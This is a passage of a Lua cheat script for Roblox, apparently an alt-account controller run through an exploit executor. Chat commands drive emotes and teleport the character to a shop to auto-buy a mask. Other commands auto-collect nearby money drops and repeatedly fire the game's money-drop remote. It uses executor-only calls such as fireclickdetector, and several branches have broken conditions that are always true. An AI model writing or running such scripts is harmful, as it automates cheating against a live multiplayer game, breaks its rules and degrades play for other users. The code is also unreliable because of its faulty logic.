CurrAnim = game.Players.LocalPlayer.Character.Humanoid.Animator:LoadAnimation(Anim)
CurrAnim:Play()
CurrAnim:AdjustSpeed()
elseif Args[1] == ""..AltControl['Commands'].Emote and Args[2] == "tpose" then
if CurrAnim and CurrAnim.IsPlaying then
CurrAnim:Stop()
end
local Anim = Instance.new("Animation")
Anim.AnimationId = "http://www.roblox.com/asset/?id=10714347453"
CurrAnim = game.Players.LocalPlayer.Character.Humanoid.Animator:LoadAnimation(Anim)
CurrAnim:Play()
CurrAnim:AdjustSpeed()
elseif Args[1] == ""..AltControl['Commands'].Emote and Args[2] == "robot" then
if CurrAnim and CurrAnim.IsPlaying then
CurrAnim:Stop()
end
local Anim = Instance.new("Animation")
Anim.AnimationId = "http://www.roblox.com/asset/?id=10714392151"
CurrAnim = game.Players.LocalPlayer.Character.Humanoid.Animator:LoadAnimation(Anim)
CurrAnim:Play()
CurrAnim:AdjustSpeed()
elseif Args[1] == ""..AltControl['Commands'].Emote and Args[2] == "monkey" then
if CurrAnim and CurrAnim.IsPlaying then
CurrAnim:Stop()
end
local Anim = Instance.new("Animation")
Anim.AnimationId = "http://www.roblox.com/asset/?id=3333499508"
CurrAnim = game.Players.LocalPlayer.Character.Humanoid.Animator:LoadAnimation(Anim)
CurrAnim:Play()
CurrAnim:AdjustSpeed()
elseif ""..AltControl['Commands'].Emote and Args[2] == "floss" then
if CurrAnim and CurrAnim.IsPlaying then
CurrAnim:Stop()
end
local Anim = Instance.new("Animation")
Anim.AnimationId = "http://www.roblox.com/asset/?id=5917459365"
CurrAnim = game.Players.LocalPlayer.Character.Humanoid.Animator:LoadAnimation(Anim)
CurrAnim:Play()
CurrAnim:AdjustSpeed()
elseif ""..AltControl['Commands'].Emote and Args[2] == "shuffle" then
if CurrAnim and CurrAnim.IsPlaying then
CurrAnim:Stop()
end
local Anim = Instance.new("Animation")
Anim.AnimationId = "http://www.roblox.com/asset/?id=434924222"
CurrAnim = game.Players.LocalPlayer.Character.Humanoid.Animator:LoadAnimation(Anim)
CurrAnim:Play()
CurrAnim:AdjustSpeed()
elseif ""..AltControl['Commands'].Emote and Args[2] == "off" then
if CurrAnim and CurrAnim.IsPlaying then
CurrAnim:Stop()
end
elseif ""..AltControl['Commands'].Emote and Args[2] == "fly" then
if CurrAnim and CurrAnim.IsPlaying then
CurrAnim:Stop()
end
local Anim = Instance.new("Animation")
Anim.AnimationId = "http://www.roblox.com/asset/?id=3541044388"
CurrAnim = game.Players.LocalPlayer.Character.Humanoid.Animator:LoadAnimation(Anim)
CurrAnim:Play()
CurrAnim:AdjustSpeed()
elseif ""..AltControl['Commands'].Emote and Args[2] == "off" then
if CurrAnim and CurrAnim.IsPlaying then
CurrAnim:Stop()
end
elseif Message == ""..AltControl['Commands'].Mask then
local plr = game.Players.LocalPlayer
local c = plr.Character
local Root = c.PrimaryPart
local OldCF = Root.CFrame
local Tries = 0
repeat wait(0.1) Tries += 1
Root.CFrame = workspace.Ignored.Shop["[Surgeon Mask] - $25"].Head.CFrame*CFrame.new(math.random(-1,1),0,math.random(-1,1))
fireclickdetector(workspace.Ignored.Shop["[Surgeon Mask] - $25"].ClickDetector)
until Tries >= 50 or not c or not c:FindFirstChild("Humanoid") or c:FindFirstChild"Mask" or plr.Backpack:FindFirstChild"Mask"
wait(0.5)
if plr.Backpack:FindFirstChild("Mask") then
c.Humanoid:EquipTool(plr.Backpack.Mask)
c.Mask:Activate()
elseif c:FindFirstChild("Mask") then
c.Mask:Activate()
end
Root.CFrame = OldCF
elseif Args[1] == ""..AltControl['Commands'].Mask and Args[2] == "off" then
local plr = game.Players.LocalPlayer
local c = plr.Character
local Root = c.PrimaryPart
if plr.Backpack:FindFirstChild("Mask") then
c.Humanoid:EquipTool(plr.Backpack.Mask)
c.Mask:Activate()
elseif c:FindFirstChild("Mask") then
c.Mask:Activate()
end
elseif Message == ""..AltControl['Commands'].Aura then
local Player = GetPlayerFromString(Args[2],true)
if Player and Player == game.Players.LocalPlayer then
if CmdSettings["Aura"] == nil then
print("Enabled!")
CmdSettings["Aura"] = true
CmdSettings["Dropping"] = nil
CmdSettings["CustomDrop"] = nil
while CmdSettings["Aura"] == true and DropFolder do
if DropFolder then
for i,v in pairs(DropFolder:GetChildren()) do
if v:IsA("BasePart") and v.Name == "MoneyDrop" then
if (v.Position-game.Players.LocalPlayer.Character.HumanoidRootPart.Position).magnitude <= 12 then
if CmdSettings["Aura"] == true then
fireclickdetector(v.ClickDetector)
end
wait(0.2)
end
end
end
end
wait()
end
end
end
elseif Args[1] == ""..AltControl['Commands'].Aura and Args[2] == "off" then
CmdSettings["Aura"] = nil
elseif Args[1] == ""..AltControl['Commands'].CustomDrop and Args[2] ~= nil and not CmdSettings["CustomDrop"] then
local Number = GetNumberFromText(Args[2])
if Number and DropFolder then
CmdSettings["Aura"] = nil
CmdSettings["Dropping"] = false
local OldMoney = 0
for i,v in pairs(DropFolder:GetChildren()) do
if v.Name == "MoneyDrop" then
local numbers = string.gsub(v.BillboardGui.TextLabel.Text, "%D", "")
OldMoney += numbers
end
end
game.ReplicatedStorage.MainEvent:FireServer(
"DropMoney",
10000
)
CmdSettings["CustomDrop"] = true
coroutine.wrap(function()
repeat wait(2.5)
game.ReplicatedStorage.MainEvent:FireServer(
"DropMoney",
10000
)
local Money = 0
if DropFolder then
for i,v in pairs(DropFolder:GetChildren()) do
if v.Name == "MoneyDrop" then
local numbers = string.gsub(v.BillboardGui.TextLabel.Text, "%D", "")
Money += numbers
end
end
end
until not DropFolder or Money >= (OldMoney+Number) or not CmdSettings["CustomDrop"]
if CmdSettings["CustomDrop"] then
CmdSettings["CustomDrop"] = nil
CmdSettings["Dropping"] = nil
game.ReplicatedStorage.DefaultChatSystemChatEvents.SayMessageRequest:FireServer('Custom Drop has finished.', 'All');
end
end)()
end
end
end
end)
end
if Host then
Initiate()
end
Services["Players"].PlayerAdded:Connect(function(Player)
if Player.Name == Variables["Controller"] then
Initiate()
end
end)